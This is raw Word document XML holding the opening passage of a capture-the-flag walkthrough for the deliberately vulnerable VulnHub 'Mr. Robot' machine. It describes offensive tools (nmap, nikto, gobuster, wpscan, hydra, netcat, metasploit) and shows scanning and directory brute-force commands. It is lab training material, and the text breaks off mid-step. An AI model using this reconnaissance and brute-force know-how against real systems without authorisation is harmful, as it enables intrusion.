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1AAD69" w14:textId="000CFEF4" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Project 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D7AC2" w14:textId="6D7B2D15" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059"/>
    <w:p w14:paraId="297D6680" w14:textId="5AB49205" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059">
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52AF6B" w14:textId="668080EB" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059"/>
    <w:p w14:paraId="6ADEA24B" w14:textId="66ACE619" w:rsidR="00B65B43" w:rsidRDefault="000A4E5B" w:rsidP="00D41059">
      <w:r w:rsidRPr="000A4E5B">
        <w:t>Th</w:t>
      </w:r>
      <w:r>
        <w:t>e Mr. Robot vulnerable machine</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4E5B">
        <w:t xml:space="preserve"> has three keys hidden in different locations. </w:t>
      </w:r>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4E5B">
        <w:t xml:space="preserve"> goal is to find all three. Each key is progressively difficult to find.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9BD7F" w14:textId="77777777" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059"/>
    <w:p w14:paraId="5911049D" w14:textId="5CEF8030" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059">
      <w:r>
        <w:t>Operating Systems used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB554BC" w14:textId="77777777" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059"/>
    <w:p w14:paraId="6B1596AA" w14:textId="394F2117" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059">
      <w:r>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE34B0A" w14:textId="7A05CAED" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00B65B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65B43">
        <w:t>https://www.kali.org/get-kali/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4734C" w14:textId="5F2D3180" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Mr. Robot:1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63D0DF14" w14:textId="2681CA30" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00B65B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65B43">
        <w:t>https://www.vulnhub.com/entry/mr-robot-1,151/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A2716" w14:textId="77777777" w:rsidR="00B65B43" w:rsidRDefault="00B65B43" w:rsidP="00D41059"/>
    <w:p w14:paraId="117B84DE" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Tools/Commands used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4E575" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="330384CF" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="290AC1BB" w14:textId="314D4D2D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 7.93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6F62E" w14:textId="5B9C0902" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F14FC" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07A4CBF6" w14:textId="1D1E9AA0" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 2.1.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831499F" w14:textId="5EBBBA16" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E24DDF" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05D2608C" w14:textId="4084C8FF" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a tool used to brute-force:  URIs (directories and files) in web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sites,  DNS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> subdomains (with wildcard support), Virtual Host names on target web servers, Open Amazon S3 buckets, Open Google Cloud buckets, TFTP servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE8A23" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78965227" w14:textId="3D4F371D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">version OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.0-RC1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DAA2AC" w14:textId="2E974B76" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multi threaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attempts to find these.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F67BF" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="655BB3E5" w14:textId="5A80A9F0" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 3.8.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A114A29" w14:textId="6668D743" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CLI tool is a free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the security of their sites. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CLI tool uses a database of 38,431 WordPress vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456C4EF" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FCDEDF3" w14:textId="4569931C" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 6.2.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E570C" w14:textId="49DD7F35" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE440C" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A154E48" w14:textId="430CD81E" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 2022.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E691CC3" w14:textId="08185D34" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Burp Suite is an integrated platform and graphical tool for performing security testing of web applications, it supports the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181414D" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B3065B" w14:textId="72914478" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 9.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07B3AA" w14:textId="52EC307B" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra is a pre-installed tool in Kali Linux used to brute-force usernames and passwords to different services such as FTP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, telnet, MS SQL, etc. Brute force can be used to try different usernames and passwords against a target to identify the correct credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B845C19" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>net cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDEEAA" w14:textId="3F71DA17" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version 1.10-47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49E9D1" w14:textId="417D50DE" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ) command is a command-line utility for reading and writing data between two computer networks. The communication happens using either TCP or UDP. The command differs depending on the system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , and others).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BCCB9" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="440987DC" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Walk through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CADD4AB" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="73C4847A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B2CC9" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="0E920D97" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="142002EB" w14:textId="395B9060" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>notes user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE818E" w14:textId="5CD1042C" w:rsidR="00134FC3" w:rsidRDefault="00134FC3" w:rsidP="00134FC3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5999E812" wp14:editId="7702A150">
            <wp:extent cx="2755900" cy="68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2785581" cy="693186"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1CB987" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080646D0" w14:textId="5AEA482A" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">notes system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AA34912" w14:textId="639F4E88" w:rsidR="00134FC3" w:rsidRDefault="003D34B6" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7194A639" wp14:editId="6CEA7F1A">
            <wp:extent cx="5943600" cy="19907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14:paraId="73D75A13" w14:textId="3AF380DC" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27A773CE" w14:textId="65791D9F" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>super user/ root interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01BAAA" w14:textId="525391A9" w:rsidR="00134FC3" w:rsidRDefault="003D34B6" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B07E82B" wp14:editId="490A21A5">
            <wp:extent cx="3073400" cy="1219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3073400" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1264B3" w14:textId="55370683" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -O [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipadress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/range]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE1015" w14:textId="1173F0C3" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">scans range of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> addresses and lists operating system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068DED19" w14:textId="1623B375" w:rsidR="00134FC3" w:rsidRDefault="003D34B6" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D164E8B" wp14:editId="66F09397">
            <wp:extent cx="5544146" cy="40894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5558637" cy="4100088"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A85183" w14:textId="59693033" w:rsidR="003D34B6" w:rsidRDefault="003D34B6" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="336AFF3A" wp14:editId="16A822B7">
            <wp:extent cx="5432683" cy="4123267"/>
            <wp:effectExtent l="0" t="0" r="317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5444170" cy="4131985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24005E7E" w14:textId="77777777" w:rsidR="003D34B6" w:rsidRDefault="003D34B6" w:rsidP="00D41059"/>
    <w:p w14:paraId="10BE601B" w14:textId="4C62D4E3" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72799624" w14:textId="3741F47D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerbility</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scanner, set host [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D2F6E" w14:textId="4C5165A3" w:rsidR="003D34B6" w:rsidRDefault="003D34B6" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B4EE76" wp14:editId="721865FE">
            <wp:extent cx="5943600" cy="31157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5954364" cy="3121376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C6260" w14:textId="77777777" w:rsidR="00134FC3" w:rsidRDefault="00134FC3" w:rsidP="00D41059"/>
    <w:p w14:paraId="3D81D4F8" w14:textId="0DCD8963" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] -w [/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlist/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/directory-list.2.3-small.txt]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D40B88" w14:textId="5F2A337C" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dictionary attack, against </w:t>
      </w:r>
